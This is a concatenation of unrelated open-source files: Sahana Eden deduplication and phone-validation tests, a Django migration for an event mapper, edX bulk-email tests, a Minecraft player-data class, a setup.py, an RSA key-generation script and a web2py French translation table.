deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - same names, no email in import item
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Test Match - same names, no email in import item, but matching DOB
person = Storage(first_name = "Test",
last_name = "UserDEDUP",
date_of_birth = datetime.date(1974, 4, 13))
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - same names, different email
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Test Match - same names, different email, but matching DOB
person = Storage(first_name = "Test",
last_name = "UserDEDUP",
date_of_birth = datetime.date(1974, 4, 13))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, same email, but other record
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - First names different
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def testMatchInitials(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test Match - same initials
person = Storage(initials="TU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, different initials
person = Storage(first_name="Test",
last_name="UserDEDUP",
initials="OU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, different initials, and email
person = Storage(first_name="Test",
last_name="UserDEDUP",
initials="OU")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same initials
person = Storage(initials="OU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same initials, same email
person = Storage(initials="TU")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# -------------------------------------------------------------------------
def testMatchDOB(self):
s3db = current.s3db
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test Match - same initials, different email, same DOB
person = Storage(initials="TU",
date_of_birth=datetime.date(1974, 4, 13))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
        # Test Mismatch - same initials, different email, different DOB
person = Storage(initials="TU",
date_of_birth=datetime.date(1975, 6, 17))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def import_item(self, person, email=None, sms=None):
""" Construct a fake import item """
from s3.s3import import S3ImportItem
def item(tablename, data):
return Storage(id = None,
method = None,
tablename = tablename,
data = data,
components = [],
METHOD = S3ImportItem.METHOD)
import_item = item("pr_person", person)
if email:
import_item.components.append(item("pr_contact",
Storage(contact_method = "EMAIL",
value = email)))
if sms:
import_item.components.append(item("pr_contact",
Storage(contact_method = "SMS",
value = sms)))
return import_item
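    # Illustrative summary of the contract exercised above (not an additional
    # test): the deduplicate hook reads item.data plus any pr_contact
    # components and, on a match, sets item.id and item.method, e.g.
    #
    #     item = self.import_item(Storage(first_name="Test", last_name="UserDEDUP"))
    #     deduplicate(item)
    #     # item.id -> self.person1_id, item.method -> S3ImportItem.METHOD.UPDATE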
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
        self.person1_id = None
        self.person2_id = None
        self.pe1_id = None
        self.pe2_id = None
# =============================================================================
class ContactValidationTests(unittest.TestCase):
""" Test validation of mobile phone numbers in pr_contact_onvalidation """
# -------------------------------------------------------------------------
def setUp(self):
current.auth.override = True
self.current_setting = current.deployment_settings \
.get_msg_require_international_phone_numbers()
# -------------------------------------------------------------------------
def tearDown(self):
settings = current.deployment_settings
current.deployment_settings \
.msg.require_international_phone_numbers = self.current_setting
current.db.rollback()
current.auth.override = False
# -------------------------------------------------------------------------
def testMobilePhoneNumberValidationStandard(self):
""" Test that validator for mobile phone number is applied """
current.deployment_settings \
.msg.require_international_phone_numbers = False
from s3db.pr import S3ContactModel
onvalidation = S3ContactModel.pr_contact_onvalidation
form = Storage(
vars = Storage(
contact_method = "SMS",
)
)
# valid
form.errors = Storage()
form.vars.value = "0368172634"
onvalidation(form)
self.assertEqual(form.vars.value, "0368172634")
self.assertFalse("value" in form.errors)
# invalid
form.errors = Storage()
form.vars.value = "036-ASBKD"
onvalidation(form)
self.assertEqual(form.vars.value, "036-ASBKD")
self.assertTrue("value" in form.errors)
# -------------------------------------------------------------------------
def testMobilePhoneNumberValidationInternational(self):
""" Test that validator for mobile phone number is applied """
current.deployment_settings \
.msg.require_international_phone_numbers = True
from s3db.pr import S3ContactModel
onvalidation = S3ContactModel.pr_contact_onvalidation
form = Storage(
vars = Storage(
contact_method = "SMS",
)
)
# valid
form.errors = Storage()
form.vars.value = "+46-73-3847589"
onvalidation(form)
self.assertEqual(form.vars.value, "+46733847589")
self.assertFalse("value" in form.errors)
# invalid
form.errors = Storage()
form.vars.value = "0368172634"
onvalidation(form)
self.assertEqual(form.vars.value, "0368172634")
self.assertTrue("value" in form.errors)
# -------------------------------------------------------------------------
def testMobilePhoneNumberImportValidationStandard(self):
""" Test that validator for mobile phone number is applied during import """
s3db = current.s3db
current.deployment_settings \
.msg.require_international_phone_numbers = False
xmlstr = """
<s3xml>
<resource name="pr_person" uuid="CONTACTVALIDATORTESTPERSON1">
<data field="first_name">ContactValidatorTestPerson1</data>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT1">
<data field="contact_method">SMS</data>
<data field="value">0368172634</data>
</resource>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT2">
<data field="contact_method">SMS</data>
<data field="value">036-ASBKD</data>
</resource>
</resource>
</s3xml>"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
resource = s3db.resource("pr_person")
result = resource.import_xml(xmltree, ignore_errors=True)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT1")
self.assertEqual(resource.count(), 1)
row = resource.select(["value"], as_rows=True).first()
self.assertNotEqual(row, None)
self.assertEqual(row.value, "0368172634")
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT2")
self.assertEqual(resource.count(), 0)
row = resource.select(["value"], as_rows=True).first()
self.assertEqual(row, None)
# -------------------------------------------------------------------------
def testMobilePhoneNumberImportValidationInternational(self):
""" Test that validator for mobile phone number is applied during import """
s3db = current.s3db
current.deployment_settings \
.msg.require_international_phone_numbers = True
xmlstr = """
<s3xml>
<resource name="pr_person" uuid="CONTACTVALIDATORTESTPERSON2">
<data field="first_name">ContactValidatorTestPerson2</data>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT1">
<data field="contact_method">SMS</data>
<data field="value">0368172634</data>
</resource>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT2">
<data field="contact_method">SMS</data>
<data field="value">+46-73-3847589</data>
</resource>
</resource>
</s3xml>"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
resource = s3db.resource("pr_person")
result = resource.import_xml(xmltree, ignore_errors=True)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT1")
self.assertEqual(resource.count(), 0)
row = resource.select(["value"], as_rows=True).first()
self.assertEqual(row, None)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT2")
self.assertEqual(resource.count(), 1)
row = resource.select(["value"], as_rows=True).first()
self.assertNotEqual(row, None)
self.assertEqual(row.value, "+46733847589")
# =============================================================================
def run_suite(*test_classes):
""" Run the test suite """
loader = unittest.TestLoader()
suite = unittest.TestSuite()
for test_class in test_classes:
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
if suite is not None:
unittest.TextTestRunner(verbosity=2).run(suite)
return
if __name__ == "__main__":
run_suite(
PRTests,
PersonDeduplicateTests,
ContactValidationTests,
)
# END ========================================================================
| mit | 5,767,524,883,297,620,000 | 36.558587 | 84 | 0.546348 | false |
cchristelis/watchkeeper | django_project/event_mapper/migrations/0001_initial.py | 5 | 7921 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import django.contrib.gis.db.models.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('email', models.EmailField(help_text=b'Your email. It will be used as your username also.', unique=True, max_length=75, verbose_name=b'Email')),
('first_name', models.CharField(help_text=b'Your first name.', max_length=100, verbose_name=b'First Name')),
                ('last_name', models.CharField(help_text=b'Your last name.', max_length=100, verbose_name=b'Last Name')),
('phone_number', models.CharField(help_text=b'It will be used for sending a notification if you want.', max_length=25, verbose_name=b'Your phone number.', blank=True)),
('notified', models.BooleanField(default=False, help_text=b'Set True to get sms notification.', verbose_name=b'Notification status.')),
('is_active', models.BooleanField(default=True, help_text=b'Whether this user is still active or not (a user could be banned or deleted).', verbose_name=b'Active Status')),
('is_admin', models.BooleanField(default=False, help_text=b'Whether this user is admin or not.', verbose_name=b'Admin Status')),
('area_of_interest', django.contrib.gis.db.models.fields.PolygonField(default=None, srid=4326, blank=True, help_text=b'Area of interest of the user.', null=True, verbose_name=b'Area of Interest')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(help_text=b'The name of the country.', max_length=50, verbose_name=b"Country's name")),
('polygon_geometry', django.contrib.gis.db.models.fields.PolygonField(srid=4326)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('category', models.IntegerField(help_text=b'There are two event categories: Incident and Advisory', verbose_name=b'Category of the event.', choices=[(1, b'Incident'), (2, b'Advisory')])),
('location', django.contrib.gis.db.models.fields.PointField(help_text=b'The location of the event in point geometry', srid=4326, verbose_name=b'Location')),
('place_name', models.CharField(help_text=b'The name of the event location.', max_length=100, verbose_name=b'Place Name')),
('date_time', models.DateTimeField(help_text=b'Date and time when the event happened.', verbose_name=b'Date and Time (UTC)')),
('killed', models.IntegerField(default=0, help_text=b'The number of killed people of the incident.', verbose_name=b'Killed People')),
('injured', models.IntegerField(default=0, help_text=b'The number of injured people of the incident.', verbose_name=b'Injured People')),
('detained', models.IntegerField(default=0, help_text=b'The number of detained people of the incident.', verbose_name=b'Detained People')),
('source', models.TextField(help_text=b'The source where the event comes from.', verbose_name=b'Source', blank=True)),
('notes', models.TextField(help_text=b'Additional notes for the event.', null=True, verbose_name=b'Notes', blank=True)),
('notified_immediately', models.BooleanField(default=False, help_text=b'If True, there will be immediate notification.', verbose_name=b'Notified Immediately')),
('notification_sent', models.BooleanField(default=False, help_text=b'If True, a notification has been sent for this event.', verbose_name=b'Notification Sent')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EventType',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the event type.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the event type.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the event type.', upload_to=b'event_type_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Perpetrator',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the perpetrator.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the perpetrator.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the perpetrator.', upload_to=b'perpetrator_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Victim',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the victim.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the victim.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the victim.', upload_to=b'victim_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='event',
name='perpetrator',
field=models.ForeignKey(verbose_name=b'Perpetrator', to='event_mapper.Perpetrator', help_text=b'The perpetrator of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='reported_by',
field=models.ForeignKey(verbose_name=b'Event Reporter', to=settings.AUTH_USER_MODEL, help_text=b'The user who reports the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='type',
field=models.ForeignKey(verbose_name=b'Event Type', to='event_mapper.EventType', help_text=b'The type of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='victim',
field=models.ForeignKey(verbose_name=b'Victim', to='event_mapper.Victim', help_text=b'The victim of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='user',
name='countries_notified',
            field=models.ManyToManyField(help_text=b'The countries that the user wants to be notified about.', to='event_mapper.Country', verbose_name=b'Notified countries'),
preserve_default=True,
),
]
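    # A sketch of how such a migration is typically applied (standard Django
    # tooling, not part of this file):
    #
    #     python manage.py migrate event_mapper 0001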
| bsd-2-clause | 2,204,084,221,235,948,000 | 59.007576 | 213 | 0.604722 | false |
cyanna/edx-platform | lms/djangoapps/bulk_email/tests/test_models.py | 14 | 7465 | """
Unit tests for bulk-email-related models.
"""
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from student.tests.factories import UserFactory
from mock import patch, Mock
from bulk_email.models import CourseEmail, SEND_TO_STAFF, CourseEmailTemplate, CourseAuthorization
from opaque_keys.edx.locations import SlashSeparatedCourseKey
@patch('bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message'))
class CourseEmailTest(TestCase):
"""Test the CourseEmail model."""
def test_creation(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
def test_creation_with_optional_attributes(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
template_name = "branded_template"
from_addr = "[email protected]"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message, template_name=template_name, from_addr=from_addr)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
self.assertEquals(email.template_name, template_name)
self.assertEquals(email.from_addr, from_addr)
def test_bad_to_option(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = "fake"
subject = "dummy subject"
html_message = "<html>dummy message</html>"
with self.assertRaises(ValueError):
CourseEmail.create(course_id, sender, to_option, subject, html_message)
class NoCourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model without loading the template data."""
def test_get_missing_template(self):
with self.assertRaises(CourseEmailTemplate.DoesNotExist):
CourseEmailTemplate.get_template()
class CourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model."""
def setUp(self):
super(CourseEmailTemplateTest, self).setUp()
# load initial content (since we don't run migrations as part of tests):
call_command("loaddata", "course_email_template.json")
def _get_sample_plain_context(self):
"""Provide sample context sufficient for rendering plaintext template"""
context = {
'course_title': "Bogus Course Title",
'course_url': "/location/of/course/url",
'account_settings_url': "/location/of/account/settings/url",
'platform_name': 'edX',
'email': '[email protected]',
}
return context
def _get_sample_html_context(self):
"""Provide sample context sufficient for rendering HTML template"""
context = self._get_sample_plain_context()
context['course_image_url'] = "/location/of/course/image/url"
return context
def test_get_template(self):
# Get the default template, which has name=None
template = CourseEmailTemplate.get_template()
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
def test_get_branded_template(self):
# Get a branded (non default) template and make sure we get what we expect
template = CourseEmailTemplate.get_template(name="branded.template")
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
self.assertIn(u"THIS IS A BRANDED HTML TEMPLATE", template.html_template)
self.assertIn(u"THIS IS A BRANDED TEXT TEMPLATE", template.plain_template)
def test_render_html_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_html_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_htmltext("My new html text.", context)
def test_render_plaintext_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_plain_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_plaintext("My new plain text.", context)
def test_render_html(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_html_context()
template.render_htmltext("My new html text.", context)
def test_render_plain(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_plain_context()
template.render_plaintext("My new plain text.", context)
class CourseAuthorizationTest(TestCase):
"""Test the CourseAuthorization model."""
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': True})
def test_creation_auth_on(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
# Test that course is not authorized by default
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
# Authorize
cauth = CourseAuthorization(course_id=course_id, email_enabled=True)
cauth.save()
# Now, course should be authorized
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Enabled"
)
# Unauthorize by explicitly setting email_enabled to False
cauth.email_enabled = False
cauth.save()
# Test that course is now unauthorized
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Not Enabled"
)
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': False})
def test_creation_auth_off(self):
course_id = SlashSeparatedCourseKey('blahx', 'blah101', 'ehhhhhhh')
# Test that course is authorized by default, since auth is turned off
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
# Use the admin interface to unauthorize the course
cauth = CourseAuthorization(course_id=course_id, email_enabled=False)
cauth.save()
# Now, course should STILL be authorized!
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
| agpl-3.0 | -5,334,411,548,091,353,000 | 41.175141 | 137 | 0.673543 | false |
OniOniOn-/MCEdit-Unified | pymclevel/player.py | 11 | 1697 | import nbt
import os
import version_utils
class Player:
def __init__(self, playerNBTFile):
self.nbtFile = playerNBTFile
        # Use os.path.basename so both POSIX and Windows paths work.
        self.nbtFileName = os.path.basename(playerNBTFile)
self.root_tag = nbt.load(playerNBTFile)
# Properties setup
self._uuid = self.nbtFileName.split(".")[0]
playerName = version_utils.getPlayerNameFromUUID(self._uuid)
if playerName != self._uuid:
self._name = playerName
else:
self._name = None
self._gametype = self.root_tag["playerGameType"].value
self._pos = [self.root_tag["Pos"][0].value, self.root_tag["Pos"][1].value, self.root_tag["Pos"][2].value]
self._rot = [self.root_tag["Rotation"][0].value, self.root_tag["Rotation"][1].value]
self._health = self.root_tag["Health"].value
self._healf = self.root_tag["HealF"].value
self._xp_level = self.root_tag["XpLevel"].value
self._inventory = self.root_tag["Inventory"].value
@property
def name(self):
return self._name
@property
def gametype(self):
return self._gametype
@property
def uuid(self):
return self._uuid
@property
def pos(self):
return self._pos
@property
def rot(self):
return self._rot
@property
def health(self):
return self._health
@property
def healf(self):
return self._healf
@property
def XP_Level(self):
return self._xp_level
@property
def inventory(self):
return self._inventory
def save(self):
raise NotImplementedError("Player Data cannot be saved right now")
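# Illustrative use (a sketch; the world path and file name below are
# placeholders):
#
#     player = Player("saves/MyWorld/playerdata/some-uuid.dat")
#     print player.name, player.gametype, player.pos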
| isc | 2,621,828,147,134,761,000 | 24.328358 | 113 | 0.582793 | false |
rafaelmartins/pyoembed | setup.py | 1 | 1114 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
setup.py
~~~~~~~~
:copyright: (c) 2014 by Rafael Goncalves Martins
:license: GPL-2, see LICENSE for more details.
"""
from setuptools import setup, find_packages
import os
cwd = os.path.dirname(os.path.abspath(__file__))
setup(
name='pyoembed',
version='0.1.2',
license='BSD',
description=('A Python library for oEmbed that supports auto-discovered '
'and manually included providers.'),
long_description=open(os.path.join(cwd, 'README.rst')).read(),
author='Rafael Goncalves Martins',
author_email='[email protected]',
platforms='any',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'requests',
'beautifulsoup4',
'lxml',
],
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
],
test_suite='pyoembed.tests',
tests_require=['mock'],
)
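# A sketch of typical use from a source checkout (commands assumed from
# standard packaging tooling, not defined in this file):
#
#     pip install .            # install pyoembed and its requirements
#     python setup.py test     # run the pyoembed.tests suite configured above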
| bsd-3-clause | -6,753,817,959,143,042,000 | 24.906977 | 77 | 0.60772 | false |
thanatos/crypto-tools | crypto_tools/generate_private_key.py | 1 | 3190 | """Generate a private key."""
import argparse
import getpass
import sys
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
# Two good sources for this:
# First, the crpyto SE:
# http://crypto.stackexchange.com/questions/1978/how-big-an-rsa-key-is-considered-secure-today
# this source helpfully includes a graph of known factorizations. There's a
# decent trendline on the graph. It's unfortunately outdated, but if the trend
# held then 1024 bit keys were factored in ~2016, which is in the past.
#
# 512-bit (**THE DEFAULT KEY SIZE IN OPENSSL**) has already been factored. This
# is this script's raison d'être.
#
# Another good source:
# https://en.wikipedia.org/wiki/RSA_Factoring_Challenge#The_prizes_and_records
# This has some for-fun factor prizes; the highest prize claimed was for a 768
# bit key. The challenge has since been withdrawn, so it is unknown if further
# prizes would have been claimed.
_MINIMUM_ALLOWED_KEY_SIZE = 2048
def main():
parser = argparse.ArgumentParser(
description=(
'Generate a new RSA private key. Output the resulting key in PEM'
' form to stdout.'
)
)
parser.add_argument(
'--key-length',
action='store',
default=2048,
type=int,
help='The length of the private key, in bits.',
)
parser.add_argument(
'--do-not-encrypt',
action='store_false',
dest='encrypt',
        default=True,
help=(
            'Don\'t encrypt the resulting *PRIVATE* key material. The result'
' is sensitive: if you leak the private key, it\'s all over.'
),
)
pargs = parser.parse_args()
if pargs.key_length < _MINIMUM_ALLOWED_KEY_SIZE:
print(
'The specified key length {} is too small, and considered'
' insecure by this script. Specify a key length of at least {}'
' bits.'.format(
pargs.key_length, _MINIMUM_ALLOWED_KEY_SIZE,
),
file=sys.stderr,
)
sys.exit(1)
if pargs.encrypt:
password = getpass.getpass()
else:
password = None
generate_rsa_key(sys.stdout, pargs.key_length, password)
def generate_rsa_key(output_file, length_in_bits, password):
"""Generate a new RSA private key."""
# We take the library's advice here: "If in doubt you should use 65537."
# (https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)
public_exponent = 65537
private_key = rsa.generate_private_key(
public_exponent,
length_in_bits,
backend=default_backend(),
)
if password is None:
encryption = serialization.NoEncryption()
else:
encryption = serialization.BestAvailableEncryption(
password.encode('utf-8')
)
key_material = private_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
encryption,
)
output_file.write(key_material.decode('ascii'))
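# Illustrative call outside the CLI (a sketch; the file name and passphrase
# are placeholders):
#
#     with open('server_key.pem', 'w') as key_file:
#         generate_rsa_key(key_file, 4096, 'correct horse battery staple')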
if __name__ == '__main__':
main()
| mit | -6,496,813,991,280,293,000 | 29.084906 | 96 | 0.643775 | false |
zvolsky/codex2020 | languages/fr.py | 1 | 9162 | # -*- coding: utf-8 -*-
{
'!langcode!': 'fr',
'!langname!': 'Français',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" est une expression optionnelle comme "champ1=\'nouvellevaleur\'". Vous ne pouvez mettre à jour ou supprimer les résultats d\'un JOIN',
'%s %%{row} deleted': '%s lignes supprimées',
'%s %%{row} updated': '%s lignes mises à jour',
'%s selected': '%s sélectionné',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'?': '?',
'About': 'À propos',
'Access Control': "Contrôle d'accès",
'admin': 'admin',
'Administrative Interface': "Interface d'administration",
'Administrative interface': "Interface d'administration",
'Ajax Recipes': 'Recettes Ajax',
'appadmin is disabled because insecure channel': "appadmin est désactivée parce que le canal n'est pas sécurisé",
'Are you sure you want to delete this object?': 'Êtes-vous sûr de vouloir supprimer cet objet?',
'Authentication': 'Authentification',
'Available Databases and Tables': 'Bases de données et tables disponibles',
'Barcode EAN': 'Barcode EAN',
'barcode printed in the publication': 'barcode printed in the publication',
'Buy this book': 'Acheter ce livre',
"Buy web2py's book": "Buy web2py's book",
'cache': 'cache',
'Cache': 'Cache',
'Cache Cleared': 'Cache Cleared',
'Cache Keys': 'Clés de cache',
'Cannot be empty': 'Ne peut pas être vide',
'change password': 'changer le mot de passe',
'Check to delete': 'Cliquez pour supprimer',
'Check to delete:': 'Cliquez pour supprimer:',
'Clear CACHE?': 'Vider le CACHE?',
'Clear DISK': 'Vider le DISQUE',
'Clear RAM': 'Vider la RAM',
'Client IP': 'IP client',
'Community': 'Communauté',
'Components and Plugins': 'Composants et Plugins',
'Config.ini': 'Config.ini',
'Controller': 'Contrôleur',
'Copyright': 'Copyright',
'Created By': 'Créé par',
'Created On': 'Créé le',
'Current request': 'Demande actuelle',
'Current response': 'Réponse actuelle',
'Current session': 'Session en cours',
'customize me!': 'personnalisez-moi!',
'data uploaded': 'données téléchargées',
'Database': 'base de données',
'Database %s select': 'base de données %s selectionnée',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'db': 'bdd',
'DB Model': 'Modèle BDD',
'Delete:': 'Supprimer:',
'Demo': 'Démo',
'Deployment Recipes': 'Recettes de déploiement',
'Description': 'Description',
'design': 'design',
'Design': 'Design',
'DISK': 'DISQUE',
'Disk Cache Keys': 'Clés de cache du disque',
'Disk Cleared': 'Disque vidé',
'Documentation': 'Documentation',
"Don't know what to do?": 'Vous ne savez pas quoi faire?',
'done!': 'fait!',
'Download': 'Téléchargement',
'E-mail': 'E-mail',
'Edit': 'Éditer',
'Edit current record': "Modifier l'enregistrement courant",
'edit profile': 'modifier le profil',
'Edit This App': 'Modifier cette application',
'Email and SMS': 'Email et SMS',
'enter an integer between %(min)g and %(max)g': 'entrez un entier entre %(min)g et %(max)g',
'Errors': 'Erreurs',
'export as csv file': 'exporter sous forme de fichier csv',
'FAQ': 'FAQ',
'Find by': 'Find by',
'First name': 'Prénom',
'Forms and Validators': 'Formulaires et Validateurs',
'Free Applications': 'Applications gratuites',
'Function disabled': 'Fonction désactivée',
'Graph Model': 'Graph Model',
'Group ID': 'Groupe ID',
'Groups': 'Groupes',
'Hello World': 'Bonjour le monde',
'Helping web2py': 'Helping web2py',
'Home': 'Accueil',
'How did you get here?': 'Comment êtes-vous arrivé ici?',
'import': 'import',
'Import/Export': 'Importer/Exporter',
'Index': 'Index',
'insert new': 'insérer un nouveau',
'insert new %s': 'insérer un nouveau %s',
'Internal State': 'État interne',
'Introduction': 'Introduction',
'Invalid email': 'E-mail invalide',
'Invalid Query': 'Requête Invalide',
'invalid request': 'requête invalide',
'Is Active': 'Est actif',
'Key': 'Clé',
'Last name': 'Nom',
'Layout': 'Mise en page',
'Layout Plugins': 'Plugins de mise en page',
'Layouts': 'Mises en page',
'Live chat': 'Chat en direct',
'Live Chat': 'Chat en direct',
'Log In': 'Log In',
'login': 'connectez-vous',
'Login': 'Connectez-vous',
'logout': 'déconnectez-vous',
'lost password': 'mot de passe perdu',
'Lost Password': 'Mot de passe perdu',
'Lost password?': 'Mot de passe perdu?',
'lost password?': 'mot de passe perdu?',
'Main Menu': 'Menu principal',
'main title of the publication': 'main title of the publication',
